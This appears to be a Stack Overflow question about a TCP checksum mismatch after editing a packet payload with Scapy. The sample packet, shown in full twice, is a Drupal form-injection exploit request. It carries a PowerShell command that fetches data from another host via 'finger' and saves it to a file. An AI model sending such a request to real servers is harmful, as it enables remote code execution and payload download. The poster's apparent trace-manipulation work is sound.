0

I've been changing content of packets, and setting the tcp.chksum back to None at the end of it. The checksum is recalculated as expected, but when (pcacap) loaded into Wireshark, the checksum is marked as incorrect.

This is my packet (will call it for now tcp)-

b"\\xfcI\\x00PZ0\\xc32\\x14\'_\\xf8P\\x18\\x01\\xf6r\\xeb\\x00\\x00POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\\r\\nHost: 240.170.0.2\\r\\nConnection: keep-alive\\r\\nAccept-Encoding: gzip, deflate\\r\\nAccept: */*\\r\\nUser-Agent: python-requests/2.18.1\\r\\nContent-Length: 201\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\n\\r\\nmail%5B%23markup%5D=powershell+%22finger+l%40240.0.0.3++++%7C+select+-Skip+2+%7Ctee+archivo.b64%22&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec"

Afterwards I do

tcp.setfieldval('chksum', None)
tcp.show2()

which gives me the following

###[ TCP ]###
  sport     = 64585
  dport     = http
  seq       = 1513145138
  ack       = 338124792
  dataofs   = 5
  reserved  = 0
  flags     = PA
  window    = 502
  chksum    = 0x72eb
  urgptr    = 0
  options   = []
###[ Raw ]###
     load      = 'POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\nHost: 240.170.0.2\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\nContent-Length: 201\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nmail%5B%23markup%5D=powershell+%22finger+l%40240.0.0.3++++%7C+select+-Skip+2+%7Ctee+archivo.b64%22&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec'

Once written out to a file (the whole pcap, using wrpcap), Wireshark marks it as incorrect and suggests the correct checksum is 0x72ef.

Can anyone identify if this is a bug or if there is a solution to this?

Note: The checksum recalculation works correctly on majority of the packets i tried, this is just one of the few on which it failed.

Edit 1: As per request, the whole packet

b"\\xfa\\x16>\\xaa\\x00\\x00\\xfa\\x16>\\x00\\x00\\x00\\x08\\x00E\\x00\\x02%.\\xc6@\\x006\\x063^\\xf0\\x00\\x00\\x02\\xf0\\xaa\\x00\\x02\\xfcI\\x00PZ0\\xc32\\x14\'_\\xf8P\\x18\\x01\\xf6`\\xd8\\x00\\x00POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\\r\\nHost: 240.170.0.2\\r\\nConnection: keep-alive\\r\\nAccept-Encoding: gzip, deflate\\r\\nAccept: */*\\r\\nUser-Agent: python-requests/2.18.1\\r\\nContent-Length: 201\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\n\\r\\nmail%5B%23markup%5D=powershell+%22finger+l%40240.0.0.3++++%7C+select+-Skip+2+%7Ctee+archivo.b64%22&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec"

Edit 2:
As requested, you can find the source code here (marked the specific function): https://github.com/Trace-Share/Trace-Manipulation/blob/04d6a6ca09a111065a9218b2818993a5b6db3b5a/TMLib/transf/PacketProcessing.py#L904-L915

Note: It should be equivalent to calling

tcp.setfieldval('load', tcp.getfieldval('load').replace(b'255.255.255.255', b'240.170.0.2))
Zerg Overmind
  • 955
  • 2
  • 14
  • 28
  • can you give the whole code? I am guessing there is IP and Ether layer, can you give them? what did you change in the TCP payload? changed size of it? – fgagnaire Nov 02 '20 at 22:09
  • I changed the IP address in both IP layer (no issue there) and the HTTP content. Size-wize, the previous IP address was max size IP address (as in length of 255.255.255.255 - not the exact IP for obvious reasons). – Zerg Overmind Nov 04 '20 at 01:17
  • ALso, i added the whole packet. (as part of the edit 1, see above). – Zerg Overmind Nov 04 '20 at 01:20
  • I still can't see the whole code. you say you change the IP, I don't see where – fgagnaire Nov 04 '20 at 20:29
  • There you go, added link to the source code on git as well as the equivalent. The HTTP class should only serve as a container for TCP.load. – Zerg Overmind Nov 04 '20 at 21:03
  • There is a lot of code in that file. what about reproducing the problem with a very small amount of code? – fgagnaire Nov 05 '20 at 15:42
  • Well, there is an example given. The code is just a framework which allows users to specify what they wish to replace. But it basically is same as calling `.replace` on the binary content of the TCP. See the last line of code under "Note:" for the last edit. – Zerg Overmind Nov 05 '20 at 16:27

0 Answers0